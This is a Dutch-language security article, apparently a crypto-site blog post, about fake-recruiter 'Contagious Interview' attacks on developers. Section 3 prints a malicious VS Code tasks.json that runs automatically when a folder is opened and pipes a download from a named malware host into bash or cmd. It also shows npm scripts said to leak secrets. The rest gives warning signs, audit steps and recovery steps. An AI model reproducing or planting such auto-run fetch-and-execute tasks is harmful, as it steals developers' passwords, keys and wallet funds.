Besmettelijk Interview: Hoe nep-recruiters ontwikkelaars hacken
Samenvatting: Een nieuwe golf van door de staat gesponsorde aanvallen overspoelt topontwikkelaars in crypto. Oplichters doen zich voor als recruiters of CTO's en dwingen kandidaten om kwaadaardige code te openen. Dit artikel analyseert de "Martin Erazo" zaak, de VS Code "tasks.json" inbraak en het noodzakelijke "Burn Protocol" om te overleven.
Disclaimer: Dit artikel rapporteert over cybersecurity-incidenten waarbij echte personen worden geïmiteerd. De namen "Martin Erazo" en "Ara Vartanian" verwijzen naar persona's die door aanvallers worden gebruikt. Wij geloven dat de echte personen met deze namen onschuldige slachtoffers zijn van identiteitsdiefstal en niet betrokken zijn bij kwaadaardige activiteiten.
1. Het Perfecte Slachtoffer: De "Martin Erazo" Persona
Het begint met een bericht dat alle juiste knoppen indrukt voor een Senior Dev:
- Role: CTO / Lead Architect
- Budget: $6M funding secured
- Tech: Web3, AI, Decentralized Infra
Bij een recent bevestigde aanval nam een recruiter genaamd "Martin Erazo" contact op via LinkedIn. Het profiel gebruikte de naam en foto van een echte theaterregisseur, maar de werkgeschiedenis was nep en veranderde in 2025 plotseling naar "IT Project Management" - een klassiek teken van een gehackt of gekocht account.
De oplichterij gaat snel. Ze slaan de standaard HR-screening over en springen direct naar een "Technical Interview" met een topmanager - in dit geval een imitatie van de echte industrie-CTO Ara Vartanian (momenteel bij Limit Break).
Rode Vlag: De projectnamen verschuiven constant. De recruiter verkoopt "Betfin" (een GameFi-platform), maar het gestuurde deck is voor "SpaceXView" (een Metaverse-project). Deze mismatch is een aanwijzing dat oplichters assets recyclen tussen campagnes.
2. De Valstrik: "Kun je onze MVP-code reviewen?"
De nep-"CTO" beweert dat ze jouw deskundige ogen nodig hebben om hun MVP (Minimum Viable Product) code te reviewen. Ze sturen een GitHub Repo-link of een ZIP-bestand en oefenen druk uit om het tijdens het interview of direct erna te openen.
Dit is waar de hack plaatsvindt.
Ze maken misbruik van je bereidheid om te helpen en je ego. Je denkt dat je jaagt op bugs in een React-component. In werkelijkheid is de bug een "feature" die ontworpen is om je spaargeld te stelen.
3. De Technische Inbraak: Zero-Click Malware
Aanvallers gebruiken "zero-click" of "low-click" exploits die ontwikkelaarstools targeten. Ze hebben niet nodig dat je de app uitvoert; alleen dat je de map opent.
Het Wapen: .vscode/tasks.json
In dit specifieke geval bevatte de Repo een boobytrapped .vscode/tasks.json bestand. Dit bestand vertelt VS Code hoe het project gebouwd moet worden.
Kwaadaardige Code:
{
"tasks": [
{
"label": "env",
"type": "shell",
"osx": {
"command": "curl -L 'https://vscodesettingtask.vercel.app/api/settings/mac' | bash"
},
"windows": {
"command": "curl --ssl-no-revoke -L https://vscodesettingtask.vercel.app/api/settings/windows | cmd"
},
"runOptions": {
"runOn": "folderOpen"
}
}
]
}
- "runOn": "folderOpen": Dit is de trekker. Zodra je de map opent in VS Code, wordt deze taak automatisch uitgevoerd.
- Payload: Het gebruikt curl om een script te downloaden van
vscodesettingtask.vercel.app- een bekende malware-host vermomd als een instellingen-API. - Resultaat: Het script draait in het geheugen en steelt onmiddellijk Chrome-wachtwoorden, sessiekoekjes en SSH-sleutels.
Plan B: package.json scripts
Als de VS Code hack mislukt, hebben ze npm-scripts:
"scripts": {
"start": "node server/server.js | react-scripts start",
"prepare": "node server/server.js"
}
Het uitvoeren van npm install of npm start activeert server/server.js - een lokaal C2 (Command and Control) script dat je Environment Variables (AWS keys, Wallet seeds) lekt naar de aanvaller.
4. Rode Vlaggen vs Groene Vlaggen
Hoe herken je het voordat het te laat is?
Als je een Dev bent, zouden "Private Repo's" of ZIP-bestanden een alarm van het hoogste niveau moeten activeren. Legitieme bedrijven gebruiken Public Repo's of standaard testplatforms.
Waarschuwing: Dit is niet de enige manier om Devs aan te vallen. Lees over de Collaborator Trap in Discord en hoe Supply Chain Attacks dependencies onveilig maken.
| 🚩 Rode Vlag (Rennen) | ✅ Groene Vlag (Veilig) |
|---|---|
| Code Eerst: Code sturen voor een baanaanbod | Standaard Proces: Eerst interview, dan code |
| Gebroken Identiteit: Recruiter heeft irrelevant verleden (bijv. Artiest -> IT Manager) | Geverifieerde Geschiedenis: LinkedIn carrièrepad is consistent |
| Mismatch: Projectnamen kloppen niet (Betfin vs SpaceXView) | Consistentie: Naam, documentatie en website komen overeen |
| Urgentie: "CTO wacht", "open nu" | Geduld: Ze respecteren je tijd en agenda |
| Persoonlijke E-mail: [email protected] | Bedrijfs E-mail: [email protected] (met werkende MX records) |
5. Security Protocol: Veilig Interviewen
Als je een Senior Dev bent, zul je opgejaagd worden. Je omgeving verharden is verplicht.
Protocol 1: "Burner" Omgeving
Gebruik NOOIT je hoofdwerkstation voor code tests.
- Virtuele Machines: Gebruik VirtualBox of VMWare.
- Cloud Dev Omgevingen: Gebruik GitHub Codespaces of Gitpod. Deze zijn van korte duur en geïsoleerd van je lokale walletbestanden.
Protocol 2: Forensische Audit
Voordat je onbekende code opent:
- Check .vscode/tasks.json: Zoek naar
runOn: folderOpen. - Check package.json: Zoek naar verdachte preinstall of postinstall scripts.
- Zoekwoord Zoeken: grep naar
curl,wget,os.homedir(),.ssh,wallet.
Protocol 3: VS Code Hardening
Schakel wereldwijd "Workspace Trust" uit.
- Settings -> Security -> Workspace -> Trust: Startup Prompt -> Always
- Dit dwingt VS Code om toestemming te vragen voordat map-niveau taken worden uitgevoerd.
6. De Oplossing: "Burn Protocol"
Als je een kwaadaardige Repo hebt geopend (zoals die gestuurd door de "Martin Erazo" persona), ga er dan vanuit dat je gehackt bent. Een rollback is niet genoeg.
- Verbinding verbreken: Trek de ethernetkabel er direct uit.
- Wallet Verbranden: Je Private Keys zijn gelekt. Maak nieuwe wallets aan op een schoon apparaat (telefoon) en verplaats resterende fondsen. Gebruik de oude seed nooit meer.
- Sessies Doden: Log uit bij alle sessies op Google, GitHub, AWS. Trek actieve sessies in.
- SSH Sleutels Auditen: Check GitHub/GitLab instellingen. Aanvallers voegen vaak hun SSH-sleutels toe om backdoor-toegang te behouden. Verwijder wat je niet herkent.
- Nuke It: Wis de schijf en installeer het OS opnieuw. Dit is de enige manier om 100% zeker te zijn dat Rootkits weg zijn.
Conclusie
De "Contagious Interview" zwendel gebruikt je eigen expertise als wapen. Het richt zich op je verlangen om problemen op te lossen. Maar in Web3 is paranoia een professionele deugd. Verifieer elke identiteit, sandbox elke repo en vertrouw nooit een "recruiter" die haast heeft dat je code uitvoert.
Klaar om Je Kennis in de Praktijk te Brengen?
Begin vandaag met vertrouwen AI-aangedreven handel
BeginGerelateerde Artikelen
Supply Chain Poison: Wanneer vertrouwde updates malware worden
Je hebt niets vreemds gedownload. Je hebt alleen de Ledger-app geüpdatet... En dat was het moment dat het geld verdween. De horror van een Supply Chain Attack.
Het Papieren Schild (The Paper Shield): Hoe je je Seed Phrase correct back-upt
Screenshots zijn desastreus. De Cloud is andermans computer. De enige veilige manier om je privésleutels te bewaren is 'Staal' en 'Papier'.
De Lange Zwendel (The Long Con): De Psychologie van 'Pig Butchering'
Ze appte niet het verkeerde nummer. En ze is niet verliefd op je. Een duik in 'Sha Zhu Pan', de wreedste zwendel in crypto, en hoe je het script herkent.